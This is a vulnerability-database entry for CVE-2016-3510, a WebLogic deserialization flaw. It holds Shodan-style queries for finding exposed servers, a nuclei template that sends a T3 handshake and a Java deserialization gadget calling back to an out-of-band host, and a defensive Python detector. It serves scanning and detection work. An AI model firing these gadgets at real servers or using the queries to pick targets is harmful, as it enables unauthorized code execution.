Oracle WebLogic Server Java Object Deserialization - Remote Code Execution

Vulnerability Information

Vulnerability name: Oracle WebLogic Server Java Object Deserialization - Remote Code Execution

Vulnerability IDs:

  • CVE: CVE-2016-3510

Vulnerability type: Deserialization

Severity: Critical

Description: This vulnerability affects Oracle WebLogic Server, a component of Oracle Fusion Middleware that is widely used for enterprise services and application deployment. WebLogic Server is a high-performance Java EE application server that supports large-scale distributed computing and the deployment of business-critical applications. Because it is so widely deployed, the vulnerability has a large impact surface.

The vulnerability is a deserialization flaw. Its technical root cause is an unspecified vulnerability in the WLS Core Components of WebLogic Server: an attacker can construct a malicious serialized object and deliver it over the T3 protocol to achieve remote code execution. Flaws of this kind typically arise because deserialization of user-supplied input lacks adequate validation and filtering, allowing an attacker to inject malicious code.

The severity lies in the fact that it allows a remote, unauthenticated attacker to affect the confidentiality, integrity and availability of the system. An attacker can execute arbitrary code, potentially leading to data leakage, service disruption or other malicious actions. Because the attack requires no user interaction and can be carried out automatically over the network, the risk is extremely high. Organizations should apply Oracle's patch immediately to prevent potential attacks.

Vendor: Oracle

Product: WebLogic Server

Affected versions: 10.3.6.0, 12.1.3.0, 12.2.1.0

Search syntax: product:"oracle weblogic", http.title:"oracle peoplesoft sign-in"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/8df03a0dd3f796dcbd6ce9d748e5d96c3b5af09f/network%2Fcves%2F2016%2FCVE-2016-3510.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details


id: CVE-2016-3510

info:
  name: Oracle WebLogic Server Java Object Deserialization - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586.
  remediation: |
    Install the relevant patch as per the advisory provided in the Oracle Critical Patch Update for July 2016.
  reference:
    - https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py
    - http://packetstormsecurity.com/files/152324/Oracle-Weblogic-Server-Deserialization-MarshalledObject-Remote-Code-Execution.html
    - http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
    - http://www.securitytracker.com/id/1036373
    - https://www.tenable.com/security/research/tra-2016-21
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-3510
    cwe-id: CWE-119
    epss-score: 0.93179
    epss-percentile: 0.99789
    cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: oracle
    product: weblogic_server
    shodan-query:
      - product:"oracle weblogic"
      - http.title:"oracle peoplesoft sign-in"
    fofa-query: title="oracle peoplesoft sign-in"
    google-query: intitle:"oracle peoplesoft sign-in"
  tags: packetstorm,cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network,tcp

variables:
  start: "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"
  end: "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"

tcp:
  - inputs:
      - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
        read: 1024

      - data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}"

    host:
      - "{{Hostname}}"
      - "{{Host}}:7001"

    read-size: 4
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4b0a00483046022100ea029832c0ab04118402ee3841955fe976f1a6733c03db8927824a3743216230022100da060ca8b653feeaf33f063732129911e95190383cbf70f8e7c43c1288f8f837:922c64590222798bb761d5b6d8e72950
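The template above shows the shape of the traffic a defender can look for: a plain-text T3 handshake line followed by a length-prefixed frame that begins a Java serialization stream. The following passive check, an added example that is not part of the nuclei template or the original page, classifies the client-to-server payloads of one TCP session on that basis; the trusted-client allowlist and the sample session are constructed for illustration.

```python
# Added example (not from the nuclei template or the original page): flag T3
# sessions that carry Java serialized objects from clients outside an
# allowlist. The allowlist CIDR and the sample session below are constructed.
import ipaddress
import re

T3_HELLO = re.compile(rb"^t3s? \d+(?:\.\d+)*\r?\n")  # e.g. "t3 12.2.1\n"
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"              # java.io.ObjectOutputStream header
TRUSTED_T3_CLIENTS = [ipaddress.ip_network("10.0.0.0/8")]  # constructed allowlist


def analyze_t3_session(src_ip, client_payloads):
    """Classify one TCP session from its client payloads (bytes, in send order)."""
    handshake = False
    serialized = 0
    for chunk in client_payloads:
        if not handshake:
            # The first client payload of a T3 session is the text handshake.
            handshake = T3_HELLO.match(chunk) is not None
            continue
        serialized += chunk.count(JAVA_STREAM_MAGIC)
    trusted = any(ipaddress.ip_address(src_ip) in net for net in TRUSTED_T3_CLIENTS)
    return {
        "t3_handshake": handshake,
        "serialized_objects": serialized,
        # T3 legitimately carries serialized objects between WebLogic peers, so
        # alert only when the client is not an expected T3 peer; T3 should be
        # filtered from untrusted networks in the first place.
        "alert": handshake and serialized > 0 and not trusted,
    }


# Constructed sample session: the handshake line used by the template, then a
# frame with the same 4-byte length prefix that starts a Java serialization
# stream (the body is placeholder bytes, not a gadget).
SAMPLE_SESSION = [
    b"t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n",
    b"\x00\x00\x04\x60" + JAVA_STREAM_MAGIC + b"\x73\x72" + b"\x00" * 8,
]

if __name__ == "__main__":
    print(analyze_t3_session("203.0.113.5", SAMPLE_SESSION))
```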

Author: lianccc

Published: 7 July 2025